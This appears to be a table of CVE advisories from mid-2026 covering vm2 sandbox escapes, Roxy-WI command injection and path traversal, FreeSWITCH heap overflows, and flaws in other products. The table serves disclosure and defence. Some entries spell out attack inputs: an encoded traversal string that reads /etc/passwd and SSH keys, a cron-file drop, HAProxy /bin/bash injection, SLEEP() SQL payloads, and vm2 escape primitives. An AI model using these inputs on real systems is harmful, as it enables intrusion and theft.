| OpenClaw--OpenClaw | OpenClaw before 2026.4.29 contains an authorization bypass vulnerability in the QQBot streaming command that allows authenticated senders to mutate configuration without explicit allowFrom restrictions. Attackers can modify QQBot streaming configuration outside intended admin policy by reaching the affected command without non-wildcard allowlist entry requirements. | 2026-06-12 | 7.7 | CVE-2026-53833 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.27 contains an authorization bypass vulnerability in QQBot pre-dispatch slash commands that allows authenticated senders to skip allowFrom policy checks. Attackers can invoke slash commands before configured access control policies are applied, potentially triggering command handling from blocked senders depending on operator configuration. | 2026-06-12 | 7.5 | CVE-2026-53834 |
| openemr--openemr | OpenEMR is a free and open source electronic health records and medical practice management application. Prior to version 8.0.0.1, a stored cross-site scripting vulnerability in the prescription CSS/HTML multi-print feature allows a patient portal user to execute arbitrary JavaScript in a clinician's browser session. Patient demographic fields (name, address) are rendered without output encoding in multiprintcss_header(), and portal patients can write attacker-controlled HTML directly into patient_data by calling the PUT api/patient/:num endpoint, which bypasses the intended audit review workflow. Because the XSS fires in the clinician's authenticated session on the main OpenEMR interface, the attacker can access CSRF tokens, session data, and perform actions as the clinician - crossing the patient-to-clinician trust boundary. This issue has been patched in version 8.0.0.1. | 2026-06-09 | 7.7 | CVE-2026-46518 |
| Oracle Corporation--PeopleSoft Enterprise PeopleTools | Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Updates Environment Management). Supported versions that are affected are 8.61 and 8.62. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successful attacks of this vulnerability can result in takeover of PeopleSoft Enterprise PeopleTools. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). | 2026-06-11 | 9.8 | CVE-2026-35273 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, by combining Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__"), Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__"), and Node.js's ERR_INVALID_ARG_TYPE Error, the host's TypeError constructor can be obtained, which allows the escape from the sandbox. This allows attackers to run arbitrary code. This issue has been patched in version 3.11.4. | 2026-06-12 | 10 | CVE-2026-47131 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, the fix for GHSA-8hg8-63c5-gwmx (CVE-2023-37903) introduced a check in nodevm.js line 263 that blocks the combination nesting: true + require: false. However, the check uses strict equality (options.require === false), which is trivially bypassed by omitting the require option entirely. When require is not specified, options.require is undefined, not false. The strict equality check fails, so the security guard is skipped. Immediately after (line 280), the destructuring default require: requireOpts = false assigns requireOpts = false, producing the exact configuration the patch was designed to prevent. This issue has been patched in version 3.11.4. | 2026-06-12 | 10 | CVE-2026-47137 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, NodeVM blocks several dangerous Node.js builtins such as module, worker_threads, cluster, vm, repl, and inspector. However, the denylist misses process and inspector/promises. Both can be used from sandboxed code to reach host-side execution primitives. This allows sandboxed code to bypass the intended builtin restrictions and execute code in the host process. This issue has been patched in version 3.11.4. | 2026-06-12 | 10 | CVE-2026-47140 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.11.4. | 2026-06-12 | 10 | CVE-2026-47208 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, a sandbox escape vulnerability in vm2 allows arbitrary code execution in the host process when untrusted code is executed with async support on runtimes exposing WebAssembly JSPI (WebAssembly.promising / WebAssembly.Suspending). In the tested configuration, a JSPI-backed Promise can reach Promise.prototype.finally() in a way that bypasses the expected Promise-species hardening and exposes a host-originated rejection object to attacker-controlled species logic, breaking the sandbox boundary. This issue has been patched in version 3.11.4. | 2026-06-12 | 9.8 | CVE-2026-47210 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, Symbol.for override in setup-sandbox.js only intercepts 2 of 9 dangerous Node.js cross-realm symbols. Combined with the bridge's set/defineProperty/deleteProperty traps having no isDangerousCrossRealmSymbol key check, sandbox code can obtain real cross-realm symbols, write them to host objects, and control host-side behavior - verified with a full util.promisify hijack chain. This issue has been patched in version 3.11.4. | 2026-06-12 | 8.7 | CVE-2026-47135 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, NodeVM supports excluding public network builtins from the wildcard builtin option. With this configuration direct access to http, https, http2, net, dgram, tls, dns, and dns/promises is blocked. However, Node.js also exposes underscored internal HTTP builtins such as _http_client and _http_server. These are not blocked when the public modules are excluded. Sandboxed code can use these internal builtins to make outbound HTTP requests and open listening HTTP sockets even though the public network modules are denied. This issue has been patched in version 3.11.4. | 2026-06-12 | 8.6 | CVE-2026-47139 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.4, the BaseHandler.set trap in bridge.js (line 1231) ignores the receiver parameter and unconditionally writes to the host target object. Per the Proxy set trap specification, when receiver !== proxy (e.g., when a child object inherits from the proxy via Object.create), the property assignment should create an own property on the receiver, not on the proxy target. The current implementation always calls otherReflectSet(object, key, value) against the host target, causing all inherited property writes to leak through to the host object. This bug provides an alternative attack vector for writing dangerous cross-realm Symbol keys (e.g., nodejs.util.promisify.custom) to host objects, bypassing any future per-trap isDangerousCrossRealmSymbol guard on the direct set path. This issue has been patched in version 3.11.4. | 2026-06-12 | 8.6 | CVE-2026-47209 |
| PbootCMS--PbootCMS | A security flaw has been discovered in PbootCMS up to 3.2.12. This vulnerability affects the function retrieve of the file apps/home/controller/MemberController.php of the component Password Handler. The manipulation of the argument username/password/email/checkcode results in weak password recovery. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-06-12 | 7.3 | CVE-2026-12066 |
| PerryTS--perry | Perry before 0.5.1159 contains a path traversal vulnerability that allows a malicious build server to write arbitrary content to any location writable by the running process by supplying unsanitized path components in the artifact_name field of ArtifactReady WebSocket messages. Attackers controlling the server URL can deliver traversal payloads through the artifact_name or download_path fields, causing the client to overwrite sensitive files or expose arbitrary local files to an attacker-accessible location. | 2026-06-11 | 8.1 | CVE-2026-53777 |
| php--frankenphp | FrankenPHP is a modern application server for PHP. From version 1.11.2 to before version 1.12.3, the splitPos() function in cgi.go misuses golang.org/x/text/search with search.IgnoreCase when the request path contains a non-ASCII byte. Two distinct flaws in that fallback let an attacker mislead FrankenPHP into treating a non-.php file as a .php script. In any deployment where the attacker can place content into a file served by FrankenPHP (uploads, file storage, etc.), this can be escalated to remote code execution by crafting a URL whose path triggers either flaw. This issue has been patched in version 1.12.3. | 2026-06-10 | 8.1 | CVE-2026-45062 |
| pi-hole--FTL | Pi-hole FTL is the core engine of the Pi-hole network-level advertisement and tracker blocker. Prior to version 6.6.1, Pi-hole FTL contains a race condition vulnerability in the HTTP session management subsystem, introduced with the v6.0 rewrite of the embedded CivetWeb-based web server. This issue has been patched in version 6.6.1. | 2026-06-10 | 8.8 | CVE-2026-44693 |
| pipecat-ai--pipecat | Pipecat is an open-source Python framework for building real-time voice and multimodal conversational agents. From version 0.0.90 to before version 1.2.0, a path traversal vulnerability exists in Pipecat's development runner (src/pipecat/runner/run.py). When the runner is started with the --folder flag, it exposes a GET /files/{filename:path} download endpoint. The filename path parameter is concatenated directly onto args.folder with no containment check. Starlette normalises literal ../ sequences in URLs, but %2F-encoded slashes bypass this normalisation: the path parameter is URL-decoded after routing, so ..%2F..%2Fetc%2Fpasswd resolves to a path two levels above args.folder. An attacker with network access to the runner can read any file the pipecat process has permission to access - including SSH private keys, credentials, and system files - with a single unauthenticated HTTP request. This issue has been patched in version 1.2.0. | 2026-06-09 | 7.5 | CVE-2026-44716 |
| plasmatizemedia--Recover Exit For WooCommerce | The Recover Exit For WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to and including 1.0.3. This is due to insufficient validation and sanitization of the user-controlled `tpf` POST parameter before it is used in an `include()` path in the `recover_exit()` function. This makes it possible for unauthenticated attackers to perform path traversal and include unintended local PHP files, which can lead to sensitive information exposure and, in certain deployment chains, code execution. | 2026-06-09 | 8.1 | CVE-2026-9662 |
| QuanticaLabs--Car Park Booking System | WordPress Car Park Booking Plugin version 13 October 17 contains a time-based SQL injection vulnerability that allows unauthenticated attackers to manipulate database queries by injecting SQL code through the space_id parameter. Attackers can send GET requests to the booking-page endpoint with malicious space_id values using AND SLEEP() payloads to extract sensitive database information. | 2026-06-09 | 8.2 | CVE-2017-20243 |
| Rapid7--Velociraptor | A YAML injection vulnerability exists in the Windows.Collectors.Remapping artifact of Rapid7 Velociraptor before version 0.76.6. The hostname field in client_info.json inside a collection ZIP is inserted into a YAML template via Go's text/template without escaping. An attacker providing a crafted collection ZIP can leverage literal double quotes and newlines in the hostname to break out of the YAML quoted string and inject a new mount remapping entry. When an analyst applies the generated remapping file with --remap, arbitrary VQL executes on their machine with NullACLManager (all permissions granted, unsandboxed). | 2026-06-09 | 7.8 | CVE-2026-8795 |
| raszi--node-tmp | tmp is a temporary file and directory creator for node.js. In version 0.2.6, the _assertPath guard added to tmp rejects only string values that contain the substring ... It is bypassed when prefix, postfix, or template is supplied as a non-string value (Array, Buffer, or any object) whose includes('..') returns falsy but whose stringification still contains ../. The value flows through Array.prototype.join/String coercion inside _generateTmpName and path.join(tmpDir, opts.dir, name), producing a final path that escapes tmpdir and creates a file or directory at an attacker-controlled location with the host process's privileges. This affects any application that forwards untrusted request data (a common pattern is JSON body fields or qs-parsed bracket-array query strings such as ?prefix[]=...) into tmp.file, tmp.fileSync, tmp.dir, tmp.dirSync, tmp.tmpName, or tmp.tmpNameSync without explicit type coercion. This vulnerability is fixed in 0.2.7. | 2026-06-11 | 8.2 | CVE-2026-49982 |
| Red Hat Inc--Migration-Agent | A flaw was found in assisted-migration-agent. The application hardcodes insecure Transport Layer Security (TLS) connections when communicating with vCenter. This vulnerability allows a Man-in-the-Middle (MITM) attacker to intercept and harvest vCenter administrator credentials. This can lead to unauthorized access to vCenter. | 2026-06-10 | 9.3 | CVE-2026-53475 |
| Red Hat Inc--Migration-Agent | A flaw was found in assisted-migration-agent. An unauthenticated attacker, located on the same local area network (LAN), can exploit a path traversal vulnerability. By crafting a specially designed gzipped tarball, the attacker can bypass security checks and write arbitrary files to the system. This could ultimately lead to the execution of unauthorized code on the appliance. | 2026-06-10 | 9.6 | CVE-2026-53476 |
| Red Hat Inc--Migration-Planner | A flaw was found in migration-planner. An authenticated user can exploit this vulnerability by sending a DELETE request to the /api/v1/sources route, which lacks proper authorization and filtering. This allows for the destruction of all customer data, including sources, agents, and assessments, leading to a critical loss of availability and integrity across the entire SaaS platform. | 2026-06-10 | 9.1 | CVE-2026-53469 |
| Red Hat Inc--Migration-Planner | A flaw was found in migration-planner. An authenticated attacker could exploit an improper access control vulnerability in the `/api/v1/sources/{id}/image-url` endpoint. This flaw allows the attacker to bypass an ownership check and obtain presigned S3 URLs for Open Virtual Appliance (OVA) images belonging to other users. Consequently, the attacker can download OVA images containing sensitive information, such as long-lived agent JSON Web Tokens (JWTs) and source configurations, potentially leading to unauthorized access and modification of the victim's source. | 2026-06-10 | 9.6 | CVE-2026-53470 |
| Red Hat Inc--Migration-Planner | A flaw was found in migration-planner. The agent-API middleware processes JSON Web Tokens (JWTs) for authentication, but its UpdateSourceInventory and UpdateAgentStatus handlers fail to validate the source_id claim within these tokens against the requested source ID. This oversight allows an authenticated attacker with a valid agent token to manipulate data across different tenants, leading to a complete collapse of tenant isolation. This could result in unauthorized overwriting of victim inventory, planting of malicious credential URLs, or corruption of migration assessments. | 2026-06-10 | 9.6 | CVE-2026-53471 |
| Red Hat Inc--Migration-Planner | A flaw was found in migration-planner. A remote authenticated attacker could exploit this vulnerability by uploading a specially crafted RVTools .xlsx file. Due to improper input sanitization, malicious SQL embedded within a spreadsheet cell is executed when cluster names are processed. This SQL Injection allows for arbitrary file reading on the system, potentially exposing sensitive information such as Kubernetes service account tokens and other credentials, which could lead to a full compromise of the SaaS environment. | 2026-06-10 | 9.6 | CVE-2026-53474 |
| Red Hat Inc--Migration-Planner-ui-app | A flaw was found in migration-planner-ui-app. An attacker can register a malicious discovery agent with a specially crafted credentialUrl containing JavaScript code. When an organizational user clicks this link in the user interface, the embedded malicious code executes within the user's browser session. This cross-site scripting (XSS) vulnerability allows the attacker to compromise the victim's Red Hat Single Sign-On (SSO) session, potentially leading to unauthorized cross-tenant data access and API actions. | 2026-06-10 | 7.3 | CVE-2026-53473 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. A limited administrator can exploit an improper access control vulnerability in the POST /admin/realms/{realm}/partialImport endpoint. This allows them to bypass Fine-Grained Admin Permissions (FGAP) and escalate their privileges to a full realm administrator by importing users with realm-admin role mappings. | 2026-06-08 | 7.2 | CVE-2026-11577 |
| Red Hat--Red Hat Directory Server 11 | An integer overflow flaw was found in the SASL I/O layer of 389 Directory Server (389-ds-base). In sasl_io_start_packet(), adding sizeof(uint32_t) to a crafted SASL packet length prefix of 0xFFFFFFFC causes unsigned wraparound to zero, bypassing the nsslapd-maxsasliosize limit and leading to a heap buffer overflow of up to approximately 2 megabytes of attacker-controlled data. After a successful SASL bind with integrity protection (SSF > 0), a remote attacker can cause a Denial of Service (DoS) or achieve Remote Code Execution (RCE). In FreeIPA and Red Hat Identity Management deployments, any domain user with a valid Kerberos ticket, enrolled host, or service account can trigger this vulnerability over the network. This flaw is independent of CVE-2025-14905, which patched schema.c only and did not modify sasl_io.c. | 2026-06-11 | 7.6 | CVE-2026-11774 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in dracut. A remote attacker on the adjacent network can exploit this vulnerability by providing specially crafted DHCP (Dynamic Host Configuration Protocol) options, such as a malicious hostname, to a system using dracut's legacy DHCP path. These options are improperly handled and written into temporary shell scripts without proper escaping, leading to command injection. This allows the attacker to achieve root code execution within the initramfs, potentially compromising the system's boot and network behavior. | 2026-06-10 | 8.8 | CVE-2026-6893 |
| Red Hat--Red Hat Enterprise Linux 10 | A local privilege escalation vulnerability was found in the ansible.posix authorized_key module. The module's keyfile() function uses os.chown() instead of os.lchown() and opens files without O_NOFOLLOW when managing SSH authorized keys. An unprivileged local user can pre-stage symbolic links in their ~/.ssh directory to redirect file ownership changes to arbitrary system paths when an operator runs the authorized_key task as root, leading to local privilege escalation. | 2026-06-10 | 7.3 | CVE-2026-11837 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in Samba's WINS server component when running as an Active Directory Domain Controller. The WINS protocol handlers for certain request types did not properly validate incoming packets, allowing an unauthenticated remote attacker to trigger a NULL pointer dereference and crash the WINS service using specially crafted UDP packets. | 2026-06-08 | 7.5 | CVE-2026-3238 |
| Red Hat--Red Hat Enterprise Linux 6 | A time-of-check time-of-use (TOCTOU) race condition was found in the abrt-dbus D-Bus service's SetElement method. Between dump directory creation and post-create event execution, any local user can call SetElement to write arbitrary text files into the root-owned dump directory, bypassing package validation and allowing crashes of unpackaged binaries to survive post-create processing. | 2026-06-13 | 7.8 | CVE-2026-54228 |
| Red Hat--Red Hat Enterprise Linux 6 | A race condition was found in the abrt-dbus D-Bus service's ChownProblemDir method. ChownProblemDir opens the dump directory with DD_OPEN_READONLY and calls dd_chown to change ownership of all files to the caller's uid, succeeding even while post-create event handlers hold a write lock. This allows an attacker to gain filesystem-level control of the dump directory while privileged event scripts are still running. | 2026-06-13 | 7 | CVE-2026-54229 |
| Red Hat--Red Hat Enterprise Linux 6 | A symlink following vulnerability was found in the ABRT post-create event handler scripts in libreport. Event scripts write output files using shell redirections without the O_NOFOLLOW flag. If the target file is replaced with a symlink, the shell process running as root follows the symlink and writes content to the symlink target, allowing arbitrary file overwrites on the system. | 2026-06-13 | 7 | CVE-2026-54230 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, PUT /smon/check (app/routes/smon/routes.py:117-138) gates only on roxywi_common.check_user_group_for_flask() - which validates that the caller has some group, not that the target check_id belongs to it. The downstream SQL update functions update_smon, update_smonHttp, update_smonTcp, update_smonPing, update_smonDns (app/modules/db/smon.py:515-562) all execute WHERE smon_id = ? with no user_group filter. The DELETE path is correctly filtered (app/modules/db/smon.py:319-327 does WHERE id = ? AND user_group = ?), demonstrating that the maintainers know the right pattern but did not apply it on UPDATE. Therefore any authenticated user can iterate over smon_id values and silently rewrite any other tenant's HTTP / TCP / Ping / DNS monitoring check. At time of publication, there are no publicly available patches. | 2026-06-10 | 9.1 | CVE-2026-45550 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, the install blueprint declares only bp.before_request → @jwt_required() (app/routes/install/routes.py:36-39). The individual endpoints install_exporter, install_waf, install_geoip, check_geoip, get_exporter_version, and get_task_status are not wrapped in page_for_admin and do not call roxywi_common.is_user_has_access_to_its_group(server_ip) or check_is_server_in_group(server_ip). Only the GET index page (install_monitoring) gates on roxywi_auth.page_for_admin(level=2). Because the missing decorators omit both role and group checks, any logged-in user - including the default guest role 4 - can install/reconfigure exporters, WAF, and GeoIP databases on every server in the Roxy-WI database, regardless of tenant ownership. The Ansible playbooks run with the per-server SSH credential stored in Roxy-WI, which the credentials' rightful owner (a different tenant) has provisioned with sudo rights for the management workflow. At time of publication, there are no publicly available patches. | 2026-06-10 | 9.9 | CVE-2026-45552 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, POST /waf/<service>/<server_ip>/rule/<rule_id>/save accepts a config_file_name form field that is passed straight through to config_mod.master_slave_upload_and_restart(...) as the destination path. The validation chain (_replace_config_path_to_correct → check_is_conf) only requires the path to contain a hard-coded service substring (nginx/haproxy/apache2/httpd/keepalived) and the substring conf or cfg, and to not contain ... The encoded-slash substitution 92 → / is applied before the substring check, so the attacker can build any absolute path anywhere on the LB filesystem as long as it satisfies those substring constraints. The body of the WAF rule (config form field) is written verbatim to that path. By choosing a filename like 92etc92cron.d92nginx_cfg_evil (resolving to /etc/cron.d/nginx_cfg_evil), an attacker drops a cron entry on the load balancer with attacker-controlled content. Cron parses the file on its next scan, executing the embedded job as root - full RCE on every load balancer the caller's group manages. At time of publication, there are no publicly available patches. | 2026-06-10 | 9.9 | CVE-2026-45556 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, the HAProxy section-save endpoints (POST /api/service/haproxy/<server_id>/section/<section_type> and the PUT / global / defaults variants) accept a JSON option field that is not validated, not escaped, and is rendered verbatim into the generated HAProxy configuration via the section.j2, global.j2, and defaults.j2 Ansible templates. Because Roxy-WI then pushes the generated config to the load balancer and runs systemctl reload haproxy, an authenticated user with role ≤ 3 (user) can inject arbitrary HAProxy directives into the config that runs on every load balancer their group manages - including option external-check + external-check command /bin/bash -c '¦', which gives remote code execution on the load balancer as the haproxy user on every health-check tick. At time of publication, there are no publicly available patches. | 2026-06-10 | 9.9 | CVE-2026-45558 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, agent_action (app/routes/smon/agent_routes.py:166-179) has decorators @bp.post('/agent/action/<action>') and @jwt_required() only - no role check, no group ownership check on the server_ip form field. Any authenticated user, including role 4 (guest), can start, stop, or restart the roxy-wi-smon-agent systemd unit on any server they can name. Roxy-WI executes the systemd action over its own SSH credentials (passwordless sudo), so the action runs as root on the target. At time of publication, there are no publicly available patches. | 2026-06-10 | 8.5 | CVE-2026-45549 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, POST /config/versions/<service>/<server_ip>/<configver>/save interpolates the URL-path configver parameter directly into a config-version path that ends up at os.system(f"dos2unix -q {cfg}"). configver is not run through EscapedString (Pydantic doesn't validate path segments declared as str) and the surrounding .. block is the broken tuple-membership patch from GHSA-vapt-004. An authenticated user with role <= 3 ("user") therefore reaches a bin/sh -c command-injection sink. At time of publication, there are no publicly available patches. | 2026-06-10 | 8.8 | CVE-2026-45564 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, EscapedString (app/modules/roxywi/class_models.py:16-30) is the centralised Pydantic validator used on dozens of fields including SSH credential name, username, description, etc. Its if/elif/elif/else flow returns the metacharacter-stripped value without also enforcing the .. block. An attacker who appends a single ;, &, |, $, or backtick to a .. payload routes the value through the strip arm, where .. survives unblocked and the result is not shlex.quote()'d either. At time of publication, there are no publicly available patches. | 2026-06-10 | 8.1 | CVE-2026-45565 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, there is an authentication bypass vulnerability via 'api' substring in URL + unauthenticated /api/gpt. At time of publication, there are no publicly available patches. | 2026-06-10 | 8.3 | CVE-2026-45567 |
| roxy-wi--roxy-wi | Roxy-WI is a web interface for managing Haproxy, Nginx, Apache and Keepalived servers. In versions 8.2.6.4 and prior, ommit d4d10006 ("Expand validation to block .. in config_file_name and configver for improved security") added a line in app/modules/config/config.py:462. This is tuple-membership, not substring containment - '..' in (a, b, c) evaluates to True only if any of a, b, c is equal to the literal string '..'. For any realistic path-traversal payload (../../etc/passwd, ..\\..\\etc\\passwd, etc.) the check returns False and the patch silently lets the payload through. At time of publication, there are no publicly available patches. | 2026-06-10 | 8.1 | CVE-2026-45569 |
| Ruijie--EG105G-P | A security flaw has been discovered in Ruijie EG105G-P 2.340. The impacted element is the function nslookup of the file /cgi-bin/luci/api/diagnose of the component JSON-RPC Diagnose Endpoint. Performing a manipulation of the argument params.target results in command injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-06-14 | 7.2 | CVE-2026-12197 |
| sahlberg--libnfs | libnfs through 6.0.2 before 55c18ea does not validate a string size, leading to an integer overflow during a connection to a crafted NFS server. This occurs in libnfs_zdr_string in lib/libnfs-zdr.c. | 2026-06-10 | 7.1 | CVE-2026-53689 |
| SAP_SE--SAP NetWeaver Application Server Java (Web Container) | SAP NetWeaver Application Server Java (Web Container) allows an unauthenticated attacker to craft a malicious HTTP logon request that manipulates file inclusion parameters, enabling path traversal and processing of the included file. Processing the included file could allow the attacker to view or modify sensitive information or render any part of the local system unavailable. | 2026-06-09 | 9 | CVE-2026-40128 |
| SAP_SE--SAP NetWeaver AS ABAP and ABAP Platform | Due to improper RFC protocol validation in the SAP Kernel used by the Application Server ABAP of SAP NetWeaver and ABAP Platform, an unauthenticated attacker can send a crafted RFC request that exploits logical errors in memory management, leading to memory corruption. This could lead to a high impact on the confidentiality, integrity, and availability of the application. | 2026-06-09 | 9.8 | CVE-2026-27671 |
| SAP_SE--SAP NetWeaver AS ABAP and ABAP Platform | SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated attacker with normal privileges to obtain a valid signed message and send modified signed XML documents to the verifier. This may result in acceptance of tampered identity information leading to unauthorized access to sensitive user data and potential disruption of normal system usage. This causes a high impact on confidentiality, integrity and availability of the application. | 2026-06-09 | 9.9 | CVE-2026-44748 |
| SAP_SE--SAP NetWeaver AS ABAP and ABAP Platform | Application server ABAP does not perform necessary authorization checks for an authenticated user allowing an attacker to execute a report generation command which could overwrite information belonging to another user, resulting in escalation of privileges. This has high impact on integrity with low impact on availability and no impact on confidentiality of the application. | 2026-06-09 | 7.1 | CVE-2026-44751 |
| Siemens--SIMATIC WinCC Unified PC Runtime V16 | A vulnerability has been identified in SIMATIC WinCC Unified PC Runtime V16 (All versions), SIMATIC WinCC Unified PC Runtime V17 (All versions), SIMATIC WinCC Unified PC Runtime V18 (All versions), SIMATIC WinCC Unified PC Runtime V19 (All versions), SIMATIC WinCC Unified PC Runtime V20 (All versions), SIMATIC WinCC Unified PC Runtime V21 (All versions < V21 Update 2). Insufficient protection of key material in WinCC Certificate Manager that could allow an attacker to extract sensitive information. | 2026-06-09 | 7.1 | CVE-2026-24349 |
| Siemens--SINEC INS | A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 6). The application does not properly sanitize user input in the /api/sftp/uploadFiles endpoint, allowing the injection of shell command payloads via crafted directory names. These payloads are stored and executed when directory listings are retrieved. This could allow an authenticated remote attacker to execute arbitrary commands on the underlying operating system with the privileges of the affected service user (sinecins). | 2026-06-09 | 8.8 | CVE-2026-46746 |
| Siemens--SINEC INS | A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 6). The affected system includes a binary that is configured with the cap_dac_override capability. This capability allows the process to bypass file system permission checks, resulting in unrestricted file system access. This could allow a local attacker to escalate privileges leading to arbitrary file modification and gaining root privileges on the system. | 2026-06-09 | 8.8 | CVE-2026-46748 |
| Siemens--SINEC INS | A vulnerability has been identified in SINEC INS (All versions < V1.0 SP2 Update 6). The affected application uses a password hashing implementation with a static, hardcoded salt shared across all users and installations, and is configured with an insufficient number of iterations. This could allow an attacker to efficiently recover user passwords using brute-force or precomputed attacks, potentially resulting in unauthorized access. | 2026-06-09 | 7.5 | CVE-2026-46749 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.1, esl_recv_event() parses Content-Length with atol() and passes the result straight to malloc(len + 1) with no sign or magnitude check. A malicious or man-in-the-middle ESL peer can send a frame with a negative Content-Length to corrupt the heap of, or crash, any process linked against libesl, before the client has authenticated to that peer. This issue has been patched in version 1.11.1. | 2026-06-09 | 9.1 | CVE-2026-49840 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.1, the mod_verto HTTP request handler allocates a fixed 2 MiB buffer for a POST application/x-www-form-urlencoded body but accepts Content-Length up to just under 10 MiB. The body-read loop is bounded by Content-Length rather than the buffer size, producing an attacker-controlled heap overflow of up to ~8 MiB -- before the HTTP basic-auth check runs. This issue has been patched in version 1.11.1. | 2026-06-09 | 9.8 | CVE-2026-49841 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.0, FreeSWITCH's bundled XML parser expands nested <!ENTITY> declarations without a depth or count bound, so a small DTD can describe a body that expands exponentially ("billion laughs"). The PIDF body of a SIP PUBLISH is fed to this parser before any digest check, letting an unauthenticated network attacker force unbounded CPU and memory consumption with a single request. This issue has been patched in version 1.11.0. | 2026-06-09 | 7.5 | CVE-2026-45771 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.0, a STUN packet whose declared attribute length is shorter than the structure the parser casts to causes the parser to read and write past the end of the attribute, producing an out-of-bounds memory access on the per-leg media buffer. This issue has been patched in version 1.11.0. | 2026-06-09 | 7.5 | CVE-2026-49475 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.1, mod_verto's WebSocket frame loop intercepts a #-prefixed speed-test protocol (#SPU / #SPB / #SPE) before any authentication check. The declared payload size in #SPU was parsed with atoi() and only rejected non-positive values, so an unauthenticated peer could request up to INT_MAX bytes. The server then wrote roughly size * 10 bytes back during the download phase, on the order of 20 GB per request, yielding strong outbound bandwidth amplification from a short request. This issue has been patched in version 1.11.1. | 2026-06-09 | 7.5 | CVE-2026-49842 |
| signalwire--freeswitch | FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.11.1, a single unauthenticated WebSocket frame containing a deeply nested JSON document crashes the FreeSWITCH process via stack overflow, terminating all calls and sessions on the host. The recursion drives the worker thread's stack pointer into the stack guard page, raising SIGSEGV from the kernel before any usable write primitive develops. This issue has been patched in version 1.11.1. | 2026-06-09 | 7.5 | CVE-2026-49847 |
| SimpleHelp--SimpleHelp | SimpleHelp versions 5.5.15 and prior and 6.0 pre-release versions contain an authentication bypass vulnerability in the OIDC authentication flow. When OIDC authentication is configured, identity tokens submitted during login are accepted without verifying their cryptographic signature. In a vulnerable configuration, a remote, unauthenticated attacker can submit a forged token containing arbitrary identity claims to obtain a fully authenticated technician session. In some configurations, this may also allow bypass of multi-factor authentication. No user interaction is required. | 2026-06-12 | 10 | CVE-2026-48558 |
